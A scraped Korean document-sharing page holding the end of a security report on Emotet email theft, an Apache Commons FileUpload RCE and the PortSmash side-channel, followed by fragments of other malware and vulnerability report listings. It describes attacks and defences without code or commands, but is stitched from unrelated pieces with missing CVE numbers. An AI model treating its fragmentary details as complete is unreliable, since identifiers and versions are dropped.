정보를임시파일 (TMP) 에저장한다. 임시파일전체가 C2 서버로전송하는기능을수행한다. 1 드로퍼 : 바이러스, 트로이목마등의악성코드를사용자가인지하지못한순간에사용자컴퓨터에설치하는프로그램 EQST insight 41
44 Emotet C2 Emotet 감염시스템 이메일스캔밎내용추출 TMP 파일에이메일저장 이메일업로드 (.TMP) C2 프록시 다량의메일정보수집 이모텟악성코드와류크랜섬웨어가융합되어발생한것으로볼때, 표적에대한맞춤형랜섬웨어공격이가능하므로이에따른각별한주의가요구된다. 악성코드에대한감염을예방하기위해서는출처가명확하지않은이메일의 URL 링크와첨부파일은실행하지말아야한다. 또한 OS 신규취약점을패치하고, 백신을최신버전으로업데이트하여주기적으로검사하는등의보안조치가이루어져야한다. EQST insight 42
45 주요키워드 2 Apache Struts 내 Commons FileUpload 라이브러리에서원격코드실행취약점 또다시발견 [ 웹로직실행경로 ] 아파치커먼스파일업로드 (Apache Commons FileUpload) 라이브러리에서원격코드실행취약점이발견되었다. 취약점에영향받는버전은아파치스트러츠 (Apache Struts) 을포함한이전버전이다. 2년전에발견된취약점 (CVE ) 으로최신 Apache Struts에서다시발견되었다. 취약한라이브러리를사용할경우공격자는자바객체를조작하여, 비직렬화 (deserialize) 시임의의위치에서디스크에쓰거나파일을복사할수있다. 취약점에대한대응방안은다음과같다. 만약취약한버전의라이브러리를사용하고있다면수동으로취약점이패 치된커먼스파일업로드라이브러리버전 으로대체해야한다. 해당라이브러리를포함하여애플리케이션으 로배포가된경우라면, WEB-INF/lib 경로에있는 commons-fileupload jar 파일을교체해야한다. EQST insight 43
46 주요키워드 3 포트스매쉬취약점발견 (CVE ) Intel CPU 에서포트스매쉬 (PortSmash) 취약점이발견되었다. 취약점에영향받는 CPU 버전은스카이레이크 (6 세 대 ) 와카비레이크 (7 세대 ) 나, AMD 의라이젠을비롯해하이퍼스레딩 (Hyper-Threading) 을지원하는 CPU 에서도 공격이가능할것으로예상된다. 이취약점은 CPU 성능향상을위해사용되는인텔의동시멀티스레딩 (SMT, Simultaneous Multithreading)/ 하이퍼스레딩의설계적결함에의해발생한다. 동일한물리적코어내인접해있는독립적인프로세스에서두스레드를실행할때, 일부하드웨어자원을공유하는특징을활용하여한프로세스가다른프로세스에대한정보를획득할수있다. 이를위해부채널공격 (Side-channel attack) 방식이사용되는데, 특정명령에소요되는정확한시간을분석하여입력한데이터를추측해내는공격이다. 포트스매시공격연구팀은이러한취약점과시간측정공격을통해동일한 CPU 코어에희생프로세스와악의적인 포트스매쉬프로세스를함께실행시킨후, 프로세스의작업을스누핑하여 OpenSSL 의개인키를획득하는데성공 하였다. 현재 PoC 가공개되었으나, 아직 Intel 에서보안패치를제공하지않은상태이다. 따라서 Intel 에서보안패치를발표 하기전까지는 CPU 칩의 BIOS 에서 SMT/ 하이퍼스레딩을비활성화해야하며, OpenSSL 사용자는해당취약점을 패치한 1.1.0i 버전과 버전소프트웨어업데이트를진행해야취약점에대응할수있다. EQST insight 44
47 INSIGHT 경기도성남시분당구판교동 255 번길 46 4 층 발행인 : SK인포섹 EQST Group 제작 : SK인포섹 Communication팀 c SK infosec All rights reserved. 본저작물은 SK인포섹의 EQST Group에서작성한콘텐츠로어떤부분도 SK인포섹의서면동의없이사용될수없습니다.
Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1
악성코드은닉사이트탐지 동향보고서 17 년상반기 1 ` 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 4 2.1 악성코드유포지현황 4 - 유포지탐지현황 4 - 대량경유지가탐지된유포지 TOP10 5 - 악성코드취약점및취약한 S/W 악용현황 6 - 악성코드유형별비율 7 - 위협 IP 및도메인현황 8 2.2 악성코드경유지현황 9 - 경유지탐지 업종별비율
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationDDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS
DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationMicrosoft PowerPoint - chap01-C언어개요.pptx
#include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More information이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론
이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN
More information월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호
안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항
More information07_alman.hwp
1. 개요 Alman 바이러스는국내에서감염피해가다수보고되었다. 여기서는 Alman 바이러스변종 에감염될경우의악성기능에대하여살펴보았다. Alman은감염된시스템내의실행파일들을추가로감염시킨다. 타시스템사용자가감염된실행파일들을감염여부를확인하지않고복사하여사용할경우감염되게된다. 또한, 네트워크공유폴더와이동디스크를통하여전파되므로, 윈도우암호와공유폴더암호를추측하기어렵게설정하고주기적으로이동저장매체에대한백신점검을실시하는것이필요하다.
More informationEclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일
Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More information당신의 AD 는안녕하십니까? AD(Active Directory) 관리자계정탈취를통한기업내부망장악사례와대응방안 본사고노트의전부나일부를인용시반드시 [ 자료 : 한국인터넷진흥원 ] 을명시하여주시기바랍니다.
당신의 AD 는안녕하십니까? AD(Active Directory) 관리자계정탈취를통한기업내부망장악사례와대응방안 2019.02.27 본사고노트의전부나일부를인용시반드시 [ 자료 : 한국인터넷진흥원 ] 을명시하여주시기바랍니다. 1. 개요 최근, 윈도우기반의 Active Directory( 이하 AD) 체계를이용하여 IT 서비스를운영하는기업이해킹된사례가다수확인된다.
More informationEQST Insight_201910
Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인
More information354-437-4..
357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%
More information품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]
품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 2014. 10. 목 차 I. Stack 통합테스트개요 1 1. 목적 1 II. 테스트대상소개 2 1. The Bug Genie 소개 2 2. The Bug Genie 주요기능 3 3. The Bug Genie 시스템요구사항및주의사항 5 III. Stack 통합테스트 7 1. 테스트환경
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2
월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.
Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3
CR-15-59 AhnLab Policy Center 4.6 for Windows 인증보고서 인증번호 : ISIS-0631-2015 2015년 7월 IT보안인증사무국 1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정
More informationBusiness Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-
More information유포지탐지동향
월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석
More informationPowerPoint 프레젠테이션
사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationNetwork Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University
Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment
More informationserver name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지
ArcGIS for Server (Windows) 설치가이드 ArcGIS 10.2 for Server 설치변경사항 1 설치 간편해진설치 -.Net Framework나 Java Runtime 요구하지않음 - 웹서버 (IIS, WebSphere ) 와별도로분리되어순수하게웹서비스기반의 GIS 서버역할 - ArcGIS Server 계정을이용한서비스운영. 더이상 SOM,
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro
More informationPowerPoint 프레젠테이션
Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2014. 03. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 15 3. 악성코드은닉사례분석
More informationTGDPX white paper
White Paper DDoS 공격 대응의 새로운 패러다임 AhnLab TrusGuard DPX Revision Version: AhnLab TrusGuard DPX White Paper ver. 1.0 Release Date: April, 2010 AhnLab, Inc. 6th Fl., CCMM Bldg. 12 Yeouido-dong, Yeongdeungpo-gu,
More information취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환
취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
